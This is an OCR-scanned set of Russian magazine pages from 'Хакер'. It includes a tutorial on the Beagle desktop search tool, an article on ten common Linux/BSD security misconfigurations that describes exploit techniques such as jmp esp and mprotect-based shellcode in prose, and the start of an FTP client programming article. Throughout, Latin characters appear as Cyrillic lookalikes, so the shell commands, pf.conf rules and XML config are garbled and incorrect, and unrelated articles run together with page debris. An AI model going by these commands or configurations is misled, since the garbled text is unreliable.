кіо-ЬеадІе — Ьеадіе кіо-зіаѵе 
руТЬоп-ЬеадІе — руСЬоп Ьіпсііпдз Тог Ьеадіе 

Кроме самого Ьеадіе, нам, очевидно, может понадобиться кеггу, который 
является интерфейсом кдемонудля среды КйЕ, и кіо-ЬеадІе, который 
позволяет интегрировать функциональность Веадіе файловому менедже- 
ру Копдиегог, реализуя протокол Ьеадіе:/. 

Хотя, впрочем, это и необязательно. Ставим: 

$ зисіо арТ-деТ іпзСаІІ Ьеадіе кіо-ЬеадІе кеггу 

В процессе установки будет создан пользователь Ьеадіеіпбех, который 
добавлен в группу подгоир с домашним каталогом /ѵаг/сасЬе/ЬеадІе. 
После установки в системе появится ряд утилит, найти которые можно, 
набрав в консоли «Ьеадіе» и нажав на табуляцию. Демон Ьеадіеб поме- 
щается в автозагрузку, но после установки автоматически не запускается. 
Почему так сделано, однозначно сказать не берусь, может потому, что 
сразу после запуска демон пытается прочитать свои конфигурационные 
файлы, которые находятся в подкаталоге -/.Ьеадіе запустившего его 
пользователя. По умолчанию таких файлов нет, соответственно, будут 
проиндексированы все каталоги на всех смонтированных разделах, что 
займетмного времени. 

Конфигурационные файлы Ьеадіе имеютпонятный ХМЬ-формат. 

Для автоматического создания конфигов в комплект входит утилита 
Ьеадіе-сопбд с большим количеством параметров. Один из них — «--Іізі- 
зесбопз», он позволяет просмотреть все возможные настройки: 

/ юз 
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^ игпхспб 




> Использование ЬеадІе-зеагсИ 

$ Ьеадіе-сопбід --Іізб-зесбіопз 
АѵаіІаЫе сопбідигабіоп зесбіопз: 

— сіаетоп 

— меЬзегѵісез 

— іпсіехіпд 

— пебѵгогкіпд 

— зеагсЪіпд 

Чтобы подробнее просмотреть возможности каждой секции, достаточно 
указать ее название без параметров: 

$ Ьеадіе-сопбід іпсіехіпд 

АѵаіІаЫе орЫопз бог зесбіоп 'іпсіехіпд' : 

— БеІКооб (Кетоѵе ап іпсіехіпд гооб) 

— БізбЕхсІисіез (Ьізб изег-зресібіесі гезоигсез Со Ье 
ехсіисіесі б г от іпсіехіпд) 

— БізбКообз (Ьізб бЬе іпсіехіпд гообз) 

— ІпсіехНоте (Тоддіез шЬеббіег уоиг бюгпе сіігесбогу із 
бо Ье іпсіехесі аз а гооб) 

— АсЫЕхсІисІе (Аскі а гезоигсе бо ехсіисіе бгош 
іпсіехіпд) 

— АсісіКооб (Асісі а гооб рабіі бо Ье іпсіехесі) 

— ВеІЕхсІисІе (Нешоѵе ап ехсіисіесі гезоигсе) 

В принципе, утилита очень проста в использовании. 

Опции, начинающиеся на Абб, добавляютаргументы в параметр 
поиска, на йеі — удаляют, на бізб — выводят. Опции Роо{ 
указывают каталог, который будет включен в поиск, Ехсіибез — то, 
что будет пропущено при поиске. Например, посмотрим, что делает 
ІпбехНоте: 

$ Ьеадіе-сопбід іпсіехіпд ІпсіехНоте 
Уоиг бюте сіігесбогу Ы11 поб Ье іпсіехесі. 

Только что индексация домашнего каталога пользователя была отключе- 
на. Повторим еще раз: 

$ Ьеадіе-сопбід іпсіехіпд ІпсіехНоте 
Уоиг бюте сіігесбогу ѵ/ііі Ье іпсіехесі. 

В одном каталогеу меня полно различной документации, добавим его в 
список: 

$ Ьеадіе-сопбід іпсіехіпд АсісІКооб /тесІіа/Ып_е/ 

сіоситепбабіоп 

Кооб асісіесі. 




> Поискв КОНСОЛИ 

И посмотрим список каталогов, которые будет индексировать демон 
Ьеадіеб: 

$ Ьеадіе-сопбід іпсіехіпд ЬізбКообз 
Сшггепб гообз: 

— Уоиг бюте сіігесбогу 

— /бюте/дгіпсіег/ . ксіе/збіаге/арріісабіопз 

— /тесііа/Ып_е /сіоситепбабіоп 

— /изг/іосаі/зііаге/арріісабіопз 

— /изг/збіаге/арріісабіопз 

Теперь можно запускать демон. Для этого просто вводим в консоли 
команду Ьеадіеб, никаких прав суперпользователя для этого не требуется 
(демон будет работать с правами запустившего его пользователя]. По 
умолчанию он запускается в фоне, освобождая консоль. Вся информация 
о его работе будетзанесена в журнал ~/.ЬеадІе/І_од/сиггепІ-ВеадІе. При 
необходимости можно запустить процесс в переднем плане. Например, 
так: 

$ Ьеадіесі --бд --ЬеЬид 

Если демон уже запущен, то после изменения настроек следует дать 
команду, чтобы он перечитал конфигурационные файлы: 

$ Ьеадіе-сопбід — Ьеадіесі-геіоасі-сопбід 

Если теперь заглянуть в домашний каталог, то можно заметить появление 
скрытого каталога .Ьеадіе, внутри которого находится еще несколько вло- 
женных подкаталогов. Все настройки сохраняются в файлах подкаталога 
сопбд. Например, все произведенные ранее настройки можно обнару- 
жить внутри файла іпбехіпд.хті: 

$ саі ~/.ЬеадІе/сопЛд/іпс1ехіпд.хтІ 

<?хт1 ѵегзіоп= " 1 . О " епсосІіпд= "ІІТЕ-8 " ?> 
сІпсіехіпдСопбід хтіпз :хзЫ="ѵ7мѵ7 . ѵ?3 . огд/2001/ 

ХМЬВсбіета" хтіпз :хзі="ѵллм.ѵ73 . огд/2 001/ХМЬЗсбіета- 
іпзбапсе"> 

<Кообз> 

<Кооб> /бюте/дгіпсіег/ . ксіе/збіаге/арр1ісабіопз</Кооб> 
<Кооб > /тесііа /Ып_е / Ьосшпепбаб і оп< / Пооб > 
<Кооб>/изг/1оса1/збіаге/арр1ісабіопз</Кооб> 
<Кооб>/изг/збіаге/арр1ісабіопз</Еооб> 

</Кообз> 

<ІпсіехНотеВіг>бгие</ІпсІехНотеВіг> 

<Ехс1исІез/> 

< / ІпсіехіпдСопб ід> 
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ипіхоій 



Для того чтобы найти нужную информацию, набираем в консоли команду 
Ьеадіе-циегу с параметром поиска: 

$ Ьеадіе-фіегу Ііпих 

И через некоторое время получаем список файлов, в которых встречает- 
ся это слово. Добавив кзапросу параметр «— ѵегЬове», можно получить 
более подробную информацию. 

Чтобы просмотреть, чем сейчас занимается демон (если есть подозрение, 
что он откровенно сачкует), вводим: 

$ ЬеадІе-зДаЦиз 

Таким образом, мы будем получать всю информацию о его работе в 
режиме реального времени. Для корректной остановки процесса Ьеадіесі 
следует использовать утилиту Ьеадіе-збиісіоѵѵп. 

Создание 

статического индекса 

В процессе работы с файлами или изменения состава каталогов 
Ьеадіесі динамически обновляет индексы, это может вызвать 
проблемы при работе со смонтированными сетевыми ресурсами. 

Ничего страшного, Веадіе умеет создавать статические индексы, 
которые затем обновляются вручную по мере необходимости. Для 
примера создадим статический индекс ресурса, смонтированного в 
/тпі. При этом будут проиндексированы все файлы, кроме трЗ'шек. 
Результат сохранится в/Ьоте/дгіпсІег/.ЬеадІе-5ІаІіс. 

$ Ьеадіе-Ъиіісі-Іпсіех --гесигзіѵе --йепу-раЬЬегп .трЗ 
--Цагдеб /Ьіоше/дгіпсіег/.ЬеадІе-зЬаЦіс /тпЦ 

И даем указание демону Ьеадіесі, чтобы он использовал статический 
индекс при поисковыхзапросах: 

$ ЬеадІе-сопЕід йаешоп АсМЗДаДісОиегуаЫе /Ьоше/ 
дгіпсіег /. Ъеадіе-зіаііс 

Г рафические фронт-эн ды 

Все, что было сказано ранее, касается поклонников консоли. Для тех, 
кто предпочитает пользоваться мышкой, имеется несколько графи- 
ческих фронт-эндов к Ьеадіе-диегу. Кроме того, некоторые програм- 
мы (Ыаиіііиз, Ѵеір, Вгазего и другие) используют Веадіе при поиске 
информации. В первую очередь, это ЬеадІе-зеагсЬ, построенный на 
библиотеках Опогпе и устанавливаемый вместе с основным пакетом, 



а также Кеггу, написанный специально для среды КОЕ. В работе эти 
две утилиты очень похожи, поэтому опишу, как работать с одной из них 
— Кеггу. 

После запуска в панели задач появится значок программы. В контекс- 
тном меню, вызываемом щелчком правой кнопкой мышки, выбираем 
пункт Сопіідиге Кеггу. В окне настройки две вкладки. Если перейти в 
Іпбехіпд, то мы увидим все каталоги, добавленные с помощью Ьеадіе- 
сопіід. Для добавления нового каталога, в котором будет производиться 
поиск, нажимаем «АсІсІ» и указываем нужный. Для удаления каталога из 
индексирования выбираем его и нажимаем «Оеі». Флажок, установлен- 
ный в «Іпсіех ту Ьоте Іоібег», включает индексирование домашнего 
каталога пользователя. Нажатие на кнопку «Арріісаііоп» добавит все 
каталоги, в которыхустановлены приложения, что позволит произво- 
дить поиск в .сіезкіор-файлах. В поле Ргіѵасу указываются файлы и ка- 
талоги, которые при индексировании надо исключить. Вкладка БеагсЬ 
позволяетуказать общие настройки работы Веадіе. Для того чтобы раз- 
решить автоматический запуск демона после регистрации пользова- 
теля, устанавливаем флажок«5іагІ зеагсЬ апб іпбехіпд аиіотаіісаііу». 
Результат поиска может быть отсортирован по релевантности, имени 
файлов и дате модификации. Все это задается в выпадающем списке 
«Оеіаиіі гезиіі зогі огбег». А количество найденных файлов, выводимое 
в одном окне, регулируется в «Махітит питЬег оі гезиіі сіізріауесі». 
Чуть ниже задаются горячие клавиши для вызова диалогового окна 
(БЬоѵѵ зеагсЬ біаіод) и запуска поиска первого слова в истории поисков 
(БеагсЬ Ргітагу Беіесііоп). 

Для поиска слова или словосочетания дважды щелкаем по значку 
и вызываем окно Кеггу Веадіе ЗеагсЬ. Вводим искомое в верхнем 
окне БеагсЬ, выбираем категорию, в которой будем искать, в списке 
ѴѴііЬіп: ЕѵегуіЬіпд (все), Арріісаііопз (приложения), ОІІісе Ооситепіз 
(офисные документы), Сопѵегзаііопз (почта, ІМ-клиенты), Ітадез 
(изображения), Месііа (музыкальные файлы) и ѴѴеЬ Радез (веб-стра- 
ницы). После выбора нажимаем «РіпсІ». Результат поиска выводится 
не сплошным текстом, а удобными для чтения блоками, в которых 
очень легко найти нужную информацию. Внизу будет показано общее 
количество документов, в которых обнаружится это слово/словосо- 
четание. Рядом с файлом выводится информация о соответствующей 
релевантности, имя файла, каталог, время последней модификации, 
данные, взятые из блока Ііііе или аналогичного, количество страниц в 
документе. Любой документ можно тут же открыть привязанной к нему 
программой: просмотреть в текстовом редакторе или веб-браузере, 
открыть в почтовом клиенте, а если это фрагмент разговора I СО, мож- 
но сразу же ответить собеседнику. 

Надеюсь, теперь найти любую информацию в используемом дистрибутиве 
Ыпихтебе будет не просто, а очень просто. Успехов. цц 



ПОИСК С ПОМОЩЬЮ ВЕА6І.Е 



Если при поиске ввести одно слово, то при большом количестве 
источников можно утонуть в полученном результате. Веадіе под- 
держивает синтаксис поиска, принятый в большинстве поисковых 
машин. Например, если необходимо найти словосочетание, оба 
слова следует заключить в кавычки: «кегпеі сопіід». Используй 
также и регулярные выражения, подставляя символы замены в 
слова: «Ыаск*». Если при поиске нужно найти документ, в котором 
не должно быть определенного слова, просто поставь перед этим 
словом знак минуса: «кегпеі -РгееВБО». Если в запросе должно 



быть либо одно, либо другое из указанных слов (либо оба сразу), 
ставь между ними ОР. Чтобы не искать во всех документах, можно 
с помощью параметра ехі указать расширение файла. Например, 
если нужно найти информацию в рсіі- документе, используем ехЕрсІІ. 
Есть и более общая конструкция: Іііеіуре. Например, информацию 
в изображениях ищем так: 1і1е1уре:ітаде. И еще возможен поиск по 
описанию (бс). Например, по заголовкам документов (бс:ІіІІе), по 
создателю документа (бс:сгеаІог), по автору (бс:аиіЬог), по артисту в 
тэге музыкального файла (бс:агІізі), по почтовому адресу отправите- 
ля (бс:таіІІтотаббг). 
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Установить Ілпих/ВЗБ не проблема, инсталлятор все сделает за нас, а вот правильно на- 
строить систему, чтобы ее тут же успешно не атаковали хакеры, удается далеко не каждому. 
Проанализировав ситуацию, мыщъх отобрал десяток наиболее распространенных ошибок, 
допускаемых не только начинающими, но и матерыми юниксоидами. 



се видели логотип на главной стра- 
нице 0репВ50?«Всеголишьдве 
удаленныеуязвимости в конфигу- 
рации по умолчанию за десять лет 
промышленной эксплуатации». Означаетли это, 
что, установив ОрепБЭй на свою машину, мы 
можем ничего не опасаться? Нет и еще раз нет! 
Несмотря на то что в хВЭй и особенно в І_іпих 
имеется достаточное количество дыр, под 
которые написано множество эксплойтов, боль- 
шинство атак совершается не через них (хотя и 
через нихтоже), а «благодаря» грубым ошибкам 
конфигурации, допущенным администратором. 
Это справедливо как для серверов, так и для 
рабочих станций, однако серверы имеютсвою 
специфику: здесь доминируют дыры в РНР/ 
Регі-скриптах, 5СН_-іп)есІіпд и т.д. Об этом уже 
неоднократно говорилось на страницах нашего 
журнала, так что оставим серверы в покое (о 
них есть, кому позаботиться) и сосредоточимся 
на рабочих станциях обычных пользователей, 
которые обучаются методом тыка и совершен- 
но незнакомы стактикой ведения боя против 
хакеров. 



1 . Использование одинаковых паролей 

Как ни печально, но большинство пользовате- 
лей, выбрав себе пароль, используютего везде, 
где только можно: на вход в систему, для доступа 
к почтовому ящику, при регистрации на различ- 
ных форумах и других сетевых ресурсах, забывая 
отом, что во всех этих случаях пароли переда- 
ются в открытом виде и могут быть выловлены 
любым снифером или путем отправки фальши- 
вого ответа от имени РЫЗ-сервера, перена- 
правляющего жертву на узел злоумышленника 
(подробнее об этом рассказывается в пункте 4). 
Также не стоитзабывать отом, что хакер может 
заманить жертву на свою страничку, подтем 
или иным предлогом требующую регистрации 
(например, для записи в гостевой книге), или 
предложить бесплатный почтовый сервис. 

С другой стороны, удержать в голове целую кучу 
паролей практически невозможно, особенно 
если они не вводятся с клавиатуры каждый раз, 
а автоматически подставляются программой. 

Но за это удобство приходится платить, и через 
некоторое время пароли начисто забываются. 
Что делать? Как быть? Записывать пароли? Так 



ведь это не выход. Если листок со списком паро- 
лей спрятать в секретном месте, то при выходе в 
сеть с чужой машины он все равно не поможет, 
а хранить пароли в записной книжке слишком 
рискованно. Мир не без любопытствующих 
товарищей! Никому доверять нельзя, а бумаге 
— тем более. 

Некоторые используют довольно хитрый трюк: 
слегка видоизменяютпароли или включаютв 
пароль имя ресурса. Например, используем в 
качестве базового пароля гбпЗд 1 к-Ь, добавляя 
к нему 1 пЬОх при регистрации почтового ящика 
на іпЬох.ги или ОЗОп при создании аккаунта в 
интернет-магазине ѵ\аллл/.020п. ги . 

2. Установка открытого ргоху 

Ргоху-серверы на рабочих станциях встре- 
чаются намного чаще, чем можно подумать. 
Во-первых, с кэшированием ѵѵеЬ-страничек 
они справляются лучше, чем браузеры. Ктому 
же при использовании нескольких браузеров 
(равно как и браузеров, запускаемых из-под 
разных пользователей) каждый из них ведет 
свой кэш, что нетолько нецелесообразно, но и 




/ 106 



ХАКЕР 06 /102/ 07 




ипіхоій 




неэкономично! При отключении в настройках 
браузеров использования локального кэша 
(кстати говоря, работа Горящего Лиса после 
этого заметно ускоряется) ргоху позволяет 
Ч взять кэширование на себя. Во-вторых, ргоху 
может решить проблему совместного доступа в 
интернет для всех членов семьи и виртуальных 
машин (типа ѴМ ѴѴаге). В-третьих, многиеус- 
танавливают ргоху-сервер просто «на всякий 
I случай», даже не разобравшись, что это за 
Ь штука и нужна ли она им или нет. 

При этом по умолчанию ргоху-сервер обычно 
доступен всем желающим, и такиежелающие 
находятся достаточно быстро ;). Какой резон 
в использовании чужого ргоху? Начнем с 
того, что большинство интернет-провайдеров 
либо вообще не тарифицируют внутрисетевой 
трафик, либо продаютего значительно де- 
шевле, чем внешний. Таким образом, отыскав 
свободный ргоху внутри сети провайдера, 
хакер кидаетжертву на бабки. Или, что еще 
хуже, совершает через него атаку, оставляя в 
логах чужой ІР. 

Некоторые переводят ргоху на нестандартные 
порты, надеясь, что там хакеры их не найдут. 
Наивные! Ведь хакеры ищутне вручную, а 
через сканеры. Другие предпочитают закры- 
вать доступ на ргоху паролем, что в смысле 
защищенности выглядит блестящим решением, 
но, ксожалению, на сегодняшний день далеко 
не все прикладные программы поддерживают 
функцию авторизации. 

Для отсечения всех «левых» хакеров достаточно 
использовать привязку к внутренним сетевым 
интерфейсам и ІР-адресам. Это достаточно 
надежный способ защиты, хотя и существует 
ряд атак, позволяющих его обойти. 

Примечание редактора: как вариант, чтобы 
прокся не стала прокисшей, демон кэши- 
рующего прокси-сервера можно подвесить 
на интерфейс обратной петли и с помощью 
файрвола перенаправлять на него все ѵѵѵѵѵѵ- 
запросы, поступающие отдоверенныххостов. 
Например, так: 



# ѵі /ебс/рГ.сопб 

ехД_іГ = "ГхрО" 
іпД_іГ = " Гхрі " 

СаЫе <с1іепДз> { 192.168.1.2/32, 
192.168.1.3/32, 192.168.1.9/32 } 
ДаЫе <по_сас1іе> { 

192.168.1.0/24, 192.168.2.0/24 } 

паД оп $ехС_іб іпеД Ггош <с1іепДз> 
До апу -> $ехД_іГ 

г(3г оп $іпД_іб іпеД ргоДо Дер Дгош 
<с1іепДз> До ! <по_сас1іе> \ 

рогД \лплм -> 127 .0.0.1 рогД 

3128 

3. Включение поддержки ІРѵб 

Поддержка ІРѵб в ВБй и Діпих появилась не 
вчера и даже не позавчера, междутем ІРѵб-стек 
все еще остается сырым и подверженным це- 
лому спектру атак: от отказа в обслуживании до 
захвата управления машиной, причем реально 
в нашей стране ІРѵб никому не нужен. Сегодня 
с ним можно разве что поиграться, да и то в ос- 
новном на серверах, а не на рабочих станциях. 
Пройдет немало лет, прежде чем протокол ІРѵб 
окажется востребованным, но и тогда останется 
возможность работы через древний ІРѵ4. Так что 
нет никаких оснований держать ІРѵб на своей 
машине, подвергая ее ненужному и совершенно 
неоправданному риску хакерской атаки. 

Выбор протокола ІРѵб осуществляется на 
стадии установки, и в дальнейшем отказаться 
от него без перекомпиляции ядра не так-то 
просто, однако существует более простой путь 
— заблокировать весь ІРѵб-трафик на бранд- 
мауэре. Для этого на хВБО-системах в правила 
файрвола достаточно добавить следующую 
строчку: 

# ѵі /еДс/рб.сопб 
Ыоск диіек іпебб аіі 



4. 0Ы5 на ІШР 

0145-протокол, поумолчанию работающий с 
использованием ІШР, небезопасен, и хакер 
может перенаправить нас на свой узел, просто 
послав фейковый ответ отимени ОЫБ-сервера. 
Чтобы этого не произошло, необходимо общать- 
ся с 0145-сервером только по ТСР-протоколу. 

Это чуть медленнее, зато намного надежнее, 
поскольку в отличие от ІШР, ТОР работаете 
установкой соединения, включающей в себя 
операцию «рукопожатия», то есть просто так 
отправитьТСР-пакетс поддельным ІР-адресом 
в заголовке нельзя, как минимум требуется уга- 
дать идентификатор последовательности, чтобы 
подделать все остальные пакеты. 

Проще всего это сделать путем блокировки 
всего ІШР-трафика на 53-м порту, однако если 
ОЫБ-сервер провайдера не поддерживает 
работу через ТОР (как, например, с^’ЬсІпзІ.то мы 
не сможем разрешать доменные имена вообще, 
что очень нехорошо. 

А почему бы неустановить свой собственный 
локальный 0145-сервер? Как показывает прак- 
тика, ОМБ-серверы большинства провайдеров 
тормозятсо страшной силой и гораздо выгоднее 
обращаться к корневым 0145-серверам, это к 
томуже еще и безопаснее. 

В I N 0 входит в поставку практически любо- 
го дистрибутива (смотри тап патеб) и уже 
содержит все необходимое, в том числе и 
адреса корневых ОЫБ-серверов, прописанные 
в конфигурационных файлах. Для большей 
надежности рекомендуется задействовать 
цифровую подпись, установив параметр аиШ- 
пхботаіп конфигурационного файла патесі.сопі 
взначениеуез. 

5. Запуск подозрительных 
программ под гооі'ом 

Считается, что вирусов под Ыпих/ВБО не 
существует. Это неверно. Вирусы есть, просто 
они не получили большого распространения в 
силу низкой распространенности самих 1_іпих/ 
В50, а также того факта, что нормальные 
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> Все знают, что 
постоянно сидеть 
под гооГом — это 
моветон, но при этом 
сплошь и рядом на- 
значают одинаковые 
пароли как на гооі'а, 
таки на простого 
пользователя. 




> Ргоху, установленный на локальной машине, позволяет блуждать по Сети из- 
под ѴѴіпбоѵѵз 2000, запущенной из ѴМ ѴѴаге 



люди сидят не под гооЕом, а под простым пользователем, 
не имеющим права модификации уже установленных 
исполняемых файлов. Тем не менее, если запустить вирус 
под гооТом, он сможеттакого натворить... Причем это от- 
носится не только к запуску, но и к компиляции! А точнее, к 
сборке исходных текстов утилитой таке, обрабатывающей 
Макебіе, который может включать в себя команды опера- 
ционной системы, предоставляющие хакеру неограничен- 
ную власть над машиной. 

Если программа получена из ненадежных источников, то 
необходимо либо выполнить аудит исходных текстов, либо 
запускать ее с помощью защитных механизмов типа зузігасе. 

6. Использование Горящего Лиса 

Лис считался надежным браузером лишь до тех пор, пока на 
него никто не обращал внимания, нотеперь по количеству 
обнаруженных дыр он вплотную приближается к печально 
известному ІЕ. И хотя массовых атак на Лиса пока отмечено 
не было, это не значит, что можно и дальше спокойно бродить 
с ним по Сети. Беспечная жизнь закончилась. Лис уже отхва- 
тил солидную долю рынка, что делает его весьма соблазни- 
тельной мишенью для хакеров. Даже оперативная установка 
самых свежих заплаток не гарантирует безопасности! 
Ксчастью, помимо Лиса есть и другие браузеры, например 
Копциегог, интегрированный в КБ Е, а также текстовой 
браузер І_упх (входящий в большинство дистрибутивов по 
умолчанию), которым очень любит пользоваться мыщъх. 

7. Использование готового 
ядра без перекомпиляции 

Большинство эксплойтов, использующих дыры в ядрах І_іпих 
и В5Б, содержат в себе жестко прошитые (багсісосіесі) адреса 
машинных команд, изменяющиеся от версии к версии и, 
естественно, при перекомпиляции. 



Ядро из коробки довольно предсказуемо, и атакующий 
может без труда установить, какой именно байт передава- 
емых данных затирает адрес возврата и чем его необхо- 
димо заменить, чтобы передать управление на зНеІІ-код. 

В большинстве случаев его заменяют адресом машинной 
инструкции )тр езр. А если выполнение в стеке запрещено, 
то выделяют блок памяти посредством вызова таНосО с 
последующей установкой атрибутов исполнения через фун- 
кцию тргоіесШ и копирования зЬеІІ-кода на новое место 
обитания функцией тетсруО. Естественно, адреса всех 
этих функций атакующий должен знать заранее, иначе у него 
ничего не получится. Уязвимая программа выбросит исклю- 
чение, которое будет отловлено ядром, и если программист 
не предусмотрел специальной обработки критических 
ситуаций, программа завершится в аварийном режиме. 

То есть дальше банального ОоБ'а хакер не продвинется. 
Атаковать систему с перекомпилированным ядром и всеми 
стандартными библиотеками практически нереально. Это 
по плечутолько настоящим профессионалам, а не кидисам, 
научившимся скачивать эксплойты из сети. 

8. Неудаленный тар-файл 

Файл Бузует. тар (обычно располающийся в каталоге /Ьооі) 
включаетв себя символьную информацию о глобальных 
переменных и функциях, экспортируемых ядром, и широко 
используется руткитами, которые прячут от глаз администра- 
тора враждебные файлы, процессы и сетевые соединения. И 
хотя достаточно многие руткиты могут находить необходимые 
им функции и без Бузует. тар'а, его удаление существенно 
уменьшает вероятность успешного проведения атаки. 

В «мирных целях» Бузует. тар нужен разве что отладчикам 
да некоторым низкоуровневым программам. На всякий 
случай, чтобы потом не перекомпилировать ядро (а Бузіет.тар 
создается именно при перекомпиляции ядра), скопируй его 
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> Пароль гЕ5І_Р0!, выловленный снифером в РОРЗ-сессии, использовался владельцем 
машины не только для доступа к почтовому ящику, но и во многихдругих местах 



в надежное место (например, на внешний но- 
ситель) или просто переименуй во что-то менее 
«напряженное». 



*піх-подобные системы размещали стек, код, 
данные и кучу в едином адресном пространстве, 
доступном для исполнения. 



хакеры, размещая исполняемый код в стеке, 
и хотя было предложено множество защитных 
комплексов, размещающих стек в неисполняе- 
мой области памяти, все они были глючными и 
ненадежными. 

Настоящая революция наступила только с появ- 
лением в процессорах Іпіеіи АМЭ новыхатрибу- 
тов защиты в каталогах страниц, называемых 
ЫХ (Ыоі еХесіДаЫе) и ХЭ (еХесиІаЫе ОіваЫесІ). 
Последние версии Ыпих/ВЗО поддерживают 
эти биты в том или ином виде, но поскольку ряд 
честных программ (и прежде всего, гипбгпе- 
компиляторов, транслирующих код «на лету» 
прямо в память) нуждается в исполняемом 
стеке, поумолчанию защита выключена во всех 
системах, кроме ОрепВЗЭ. 



«ЯДРО ИЗ КОРОБКИ ДОВОЛЬНО ПРЕДСКАЗУЕМО, И АТАКУЮЩИЙ МОЖЕТ 
БЕЗ ТРУДА УСТАНОВИТЬ, КАКОЙ ИМЕННО БАЙТ ПЕРЕДАВАЕМЫХ ДАННЫХ 
ЗАТИРАЕТ АДРЕС ВОЗВРАТА» 



9. Отсутствующие директории в ІіЬ 

Порядок поиска динамических библиотекзада- 
ется системной переменной І_0_І_ІВВАВѴ_РАТН, 
значение которой берется из конфигурацион- 
ного файла /еіс/ісі.во.сопбд, перечисляющего 
директории с динамическими библиотеками. 

В корректно установленной системе право со- 
здания новых файлов в этих директориях имеет 
только гооТ Это логично, поскольку в противном 
случае любой желающий смог бы добавить 
свою зловредную библиотеку в вышестоящую 
директорию, да так, чтобы она загружалась 
вместо оригинала. 

Некоторые инсталляторы (например, установ- 
щик Кпорріх'а) прописывают в файле /еЩ/Ш. во. 
сопбд пути к несуществующим директориям. 
Казалось бы, ну что тут та ко го? Мелочь... На 
самом деле, это огромная дыра в безопаснос- 
ти, поскольку для создания директорий иметь 
права гооТа совершенно не обязательно, и в 
них можно размещать библиотеки-спутники, 
работающие по принципу вирусов-спутников, 
известных еще со времен МЗ-йОЗ. Открой файл 
/еЩ/ІсІ.во.сопбд и удали из него все несуществу- 
ющие пути, если таковые там присутствуют. 

1 0. Игнорирование битов ЫХ/Хй 

Долгое время х86-процессоры поддерживали 
только два атрибута защиты на уровне стра- 
ниц: атрибут доступности и атрибутзаписи. Ат- 
рибут исполнения кода поддерживался только 
на уровне селекторов, и практически все 



Несмотря на то что функция тргоІесД) подде- 
рживаетчетыре атрибута защиты: РН0Т_Ы0МЕ, 
РРОТ_РЕАО, РРОТ_ѴѴРІТЕ и РР0Т_ЕХЕС, на 
аппаратном уровне атрибут РР0Т_ЕХЕС являет- 
ся синонимом атрибута РРОТ_РЕАО, то есть если 
страницу можно прочитать, то с тем же успехом ее 
можно и исполнить. Этой дырой воспользовались 



И хотя неисполняемые биты отнюдь не панацея 
(хакеры уже давно научились обходить их), тем 
не менее они чрезвычайно затрудняют атаку, а 
в сочетании с перекомпилированным ядром и 
системными библиотеками делают ее практи- 
чески невозможной. Так что смысл в этой защите 
все-таки есть, и лучше держать ее на готове. ИНИ 



> Команды в Макейіе 
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Куем коммерческий РТР-клиент без использования компонентов 

РТР-клиент — одна из самых часто используемых утилит в повседневной жизни продви- 
нутого пользователя. Закачать Ьіті-странички, слить \ѵагех с сервака, качнуть фильмов 
в локалке — работа РТР-клиента. Стоимость таких программ на рынке колеблется от 10 
до 100 баксов. Скажи, тебе не хочется срубить столько же, да еще и не особо напрягаясь? 
Если ты решительно ответил «Да», то усаживайся поудобнее и читай статью, познавая сек- 
реты программирования РТР-клиентов. Ріикаких компонентов, никаких чужих библиотек 
— все свое, родное! 



Теория РТР-протокола 

РіІеІхапзІегргоІосоКпротокол передачи файлов) беретсвое начало в 70-х. 
Именно вто время возникла необходимость в создании протокола, который 
смогбы решить проблему передачи файлов с одного компьютера на другой. 
На протяжении 30 лет протокол неоднократно менялся и совершенство- 
вался. Последняя спецификация приведена в РРС 959 ( Ьир://аіЬепа.ѵѵ5и. 
ги/бос5Асрір/Н : с/гі : с959.М ). Я очень рекомендую тебе скачать этот документ 
и хорошенько с ним ознакомиться, поскольку только в нем ты найдешь 
ответы на вопросы, которые могут возникнуть у тебя при написании полно- 
ценного РТР-клиента. Как и большинство сетевых протоколов (НТТР, РОРЗ, 
5МТР и др.), РТР работает поверхТСР. В отличие от всех перечисленных 
протоколов, РТР обладает одной интересной особенностью. Для полноцен- 
ной работы ему нужно не одно, а целых два соединения: 

1. Управляющее — используется на протяжении всего сеанса связи. По 
этому соединению отправляются все команды для РТР-сервера и возвра- 
щаются результаты их выполнения. 

2. Соединение для передачи данных — создается в момент, когда нужно 
получить/отправить данные. После передачи данных соединение долж- 
но завершиться. 

Установка соединения 

Давай подробно рассмотрим процесс установки связи с РТР-серве- 
ром. Чтобы выполнить какую-либо команду, клиенту нужно установить 



управляющее соединение. Сделать это можно, подключившись на 21 -й 
порт (порт по умолчанию у большинства РТР-серверов) удаленного ком- 
пьютера. Кактолько соединение будет установлено, РТР-сервер отправит 
приветствие. Обычно в нем содержится название используемого сервера 
и другие данные. Для продолжения работы клиенту необходимо пройти 
авторизацию — отправить серверу свой логин и пароль. Логин передает- 
ся командой ІІ5ЕР [имя пользователя], а пароль — командой РА55 [твой 
пароль]. Если введенные данные окажутся верными, то сервер радостно 
отправит сообщение с кодом «230 ОК». Текст этого сообщения означа- 
ет, что авторизация успешно пройдена и можно отправлять команды. 
Наглядный пример установки управляющего соединения ты можешь 
увидеть на рисунке, где изображено, какс помощью Іеілеі: я подсоеди- 
нился кАр-серверу. 

После установки управляющего соединения можно посылать команды для 
получения списка файлов или же для копирования самих файлов, но перед 
этим необходимо установить второе соединение — для передачи данных. 

Я уже много раз говорил о соединении для передачи данных, но до сих пор 
ничего не сказал о принципах его создания. Первым делом программе- 
клиенту нужно открыть любой свободный порт. Затем удаленному серверу 
необходимо послать данные в специальном формате, которые будут 
включать ІР-адрес (твой реальный ІР) и порт (тот, который ты и открывал для 
подключения). Все эти данные отправляются с помощью команды РОРТ. 
Еслиты читал внимательно, то, наверное, обратил внимание наупоминание 
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> Управляющее соединение 

0 специальном формате. Чтобы долго не объяснять, покажу на простом 
примере, а недостающую теорию ты всегда сможешь почерпнуть из 
РРС-959. Допустим, чтоу клиента в качестве ІР-адресау нас 192.168.0.1, а 
открытым портом является 31337-й. Тогда команда РОРТ будет выглядеть 
следующим образом: «РОРТ 192,168,0,1 ,122,105». Думаю, разглядеть ІР- 
адрес в этой строке тебе удалось, а вот при поиске порта, вероятнее всего, 
возникли небольшие проблемы. По спецификации РРС, номер порта 
нужно передавать двумя числами. В нашем примере это 122 и 105. Теперь 
ясно, для чего эти цифры нужны, но неясно, какое отношение они имеют 
к31337-му порту. Ответ, какобычно, находится в РРС. Согласно этому до- 
кументу, синтаксис команды РОРТ выглядит следующим образом: «РОРТ 
п 1 , п2, пЗ, п4, п5, пб», где пі -п4 — разделенный запятыми ІР-адрес, а 
п5*256+п6 — номер порта. Теперь ясно? Нет? Ок! Бери в руки старый каль- 
кулятор и приготовься выполнить простейшие математические операции. 
